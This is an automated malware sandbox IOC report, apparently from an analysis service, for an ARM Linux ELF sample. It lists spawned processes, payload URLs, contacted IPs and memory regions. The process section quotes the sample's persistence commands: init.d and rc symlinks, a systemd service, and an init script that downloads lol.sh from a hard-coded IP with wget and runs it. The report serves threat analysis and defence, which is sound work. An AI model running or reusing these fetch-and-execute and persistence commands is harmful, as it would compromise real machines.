Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn-20241014-0317.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn-20241014-0317.elf'\n /tmp/arm7.nn-20241014-0317.elf &\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn-20241014-0317.elf'\n killall arm7.nn-20241014-0317.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn-20241014-0317.elf"

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/arm7.nn-20241014-0317.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/arm7.nn-20241014-0317.elf

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/arm7.nn-20241014-0317.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf

/tmp/arm7.nn-20241014-0317.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/systemd/systemd

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 39 hidden processes, click here to show them.

URLs

Name

Malicious

http://87.120.84.247/

unknown

Details

Name:	http://87.120.84.247/
TargetID:	-1
From Memory:	true
Source:	arm7.nn-20241014-0317.elf, profile.12.dr, inittab.12.dr, arm7.nn-20241014-0317.elf.37.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://87.120.84.247/curl.sh

unknown

Details

Name:	http://87.120.84.247/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/arm7.nn-20241014-0317.elf
Source:	arm7.nn-20241014-0317.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://87.120.84.247/lol.sh

unknown

Details

Name:	http://87.120.84.247/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/arm7.nn-20241014-0317.elf
Source:	arm7.nn-20241014-0317.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

44.16.160.26

unknown

United States

37.24.249.116

unknown

Germany

83.137.173.159

unknown

Germany

15.214.12.109

unknown

United States

145.251.89.48

unknown

Sweden

192.72.93.104

unknown

Taiwan; Republic of China (ROC)

57.175.58.206

unknown

Belgium

98.217.7.244

unknown

United States

183.26.185.3

unknown

China

23.147.25.209

unknown

Reserved

94.157.232.224

unknown

Netherlands

125.70.1.191

unknown

China

9.49.145.198

unknown

United States

51.195.206.221

unknown

France

50.148.190.167

unknown

United States

68.79.250.163

unknown

United States

82.249.237.104

unknown

France

89.122.218.199

unknown

Romania

89.156.236.170

unknown

France

108.194.245.60

unknown

United States

215.83.142.111

unknown

United States

141.93.191.42

unknown

Netherlands

54.191.182.223

unknown

United States

126.251.172.245

unknown

Japan

189.215.206.76

unknown

Mexico

12.61.200.120

unknown

United States

204.50.220.94

unknown

Canada

104.124.6.21

unknown

United States

184.23.186.178

unknown

United States

80.127.194.131

unknown

Netherlands

165.201.64.245

unknown

United States

95.190.92.216

unknown

Russian Federation

18.173.114.73

unknown

United States

175.67.211.90

unknown

China

11.9.118.150

unknown

United States

2.106.88.98

unknown

Denmark

100.179.23.4

unknown

United States

75.137.117.248

unknown

United States

96.76.82.66

unknown

United States

116.251.7.56

unknown

Australia

167.107.97.4

unknown

United States

99.214.118.16

unknown

Canada

83.188.137.211

unknown

Sweden

12.150.124.23

unknown

United States

193.92.36.116

unknown

Greece

12.90.135.179

unknown

United States

157.120.226.44

unknown

United Kingdom

154.190.196.44

unknown

Egypt

204.143.5.64

unknown

United States

124.112.153.161

unknown

China

187.200.136.57

unknown

Mexico

39.53.241.39

unknown

Pakistan

88.55.241.19

unknown

Italy

115.246.144.183

unknown

India

35.187.46.153

unknown

United States

147.132.137.115

unknown

Australia

147.201.81.51

unknown

United Kingdom

219.152.25.215

unknown

China

216.248.111.18

unknown

United States

25.233.176.5

unknown

United Kingdom

73.227.30.47

unknown

United States

77.44.133.159

unknown

Syrian Arab Republic

37.202.88.53

unknown

Jordan

37.77.63.126

unknown

Netherlands

25.54.199.191

unknown

United Kingdom

152.71.160.253

unknown

United Kingdom

187.242.155.35

unknown

Mexico

157.232.246.25

unknown

United States

12.76.213.170

unknown

United States

165.38.160.42

unknown

United States

88.143.185.147

unknown

France

156.238.189.164

unknown

Seychelles

29.39.190.159

unknown

United States

221.48.15.173

unknown

Japan

14.116.136.85

unknown

China

180.233.40.87

unknown

China

11.89.107.185

unknown

United States

193.143.1.59

unknown

148.227.253.98

unknown

Mexico

128.253.97.199

unknown

United States

221.142.223.41

unknown

Korea Republic of

93.88.38.33

unknown

Italy

43.218.112.185

unknown

Japan

25.123.126.211

unknown

United Kingdom

166.108.61.59

unknown

United States

179.15.192.40

unknown

Colombia

130.230.171.14

unknown

Finland

129.32.204.60

unknown

United States

53.19.188.179

unknown

Germany

24.163.133.54

unknown

United States

94.137.110.102

unknown

Sweden

36.15.107.199

unknown

Japan

86.4.154.219

unknown

United Kingdom

108.122.57.78

unknown

United States

31.181.83.136

unknown

Russian Federation

82.212.165.0

unknown

Belgium

206.211.34.61

unknown

United States

34.242.128.2

unknown

United States

198.215.56.33

unknown

United States

67.246.121.72

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7fddd8036000

page execute read

7fddd8036000

page execute read

5560042cf000

page read and write

7fdee014c000

page read and write

7fdee0191000

page read and write

5560042d8000

page read and write

5560062ed000

page read and write

5560042cf000

page read and write

7fdedfe1e000

page read and write

7fdedf842000

page read and write

7fff08aac000

page execute read

7fdedec46000

page read and write

7fff08aac000

page execute read

7fddd8049000

page read and write

7fdedffff000

page read and write

7fff08a42000

page read and write

7fdedfe1e000

page read and write

7fded8021000

page read and write

7fdedf44e000

page read and write

7fddd803e000

page read and write

7fdee014c000

page read and write

7fdedfad0000

page read and write

556006a82000

page read and write

7fdedf4e0000

page read and write

7fdee0191000

page read and write

7fdedfc3c000

page read and write

7fdedfaad000

page read and write

7fdedf4e0000

page read and write

7fdedec46000

page read and write

7fddd8043000

page read and write

7fddd803e000

page read and write

7fded7fff000

page read and write

556006a82000

page read and write

55600407e000

page execute read

7fdedfad0000

page read and write

7fded8021000

page read and write

7fdee0128000

page read and write

7fdedf44e000

page read and write

7fff08a42000

page read and write

5560062ed000

page read and write

7fdedffff000

page read and write

7fded7fff000

page read and write

7fdee0128000

page read and write

5560062d6000

page execute and read and write

7fdedf842000

page read and write

7fddd8043000

page read and write

5560042d8000

page read and write

7fdedfc3c000

page read and write

55600407e000

page execute read

7fdedfaad000

page read and write

5560062d6000

page execute and read and write

There are 41 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm7.nn-20241014-0317.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm7.nn-20241014-0317.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
arm7.nn-20241014-0317.elf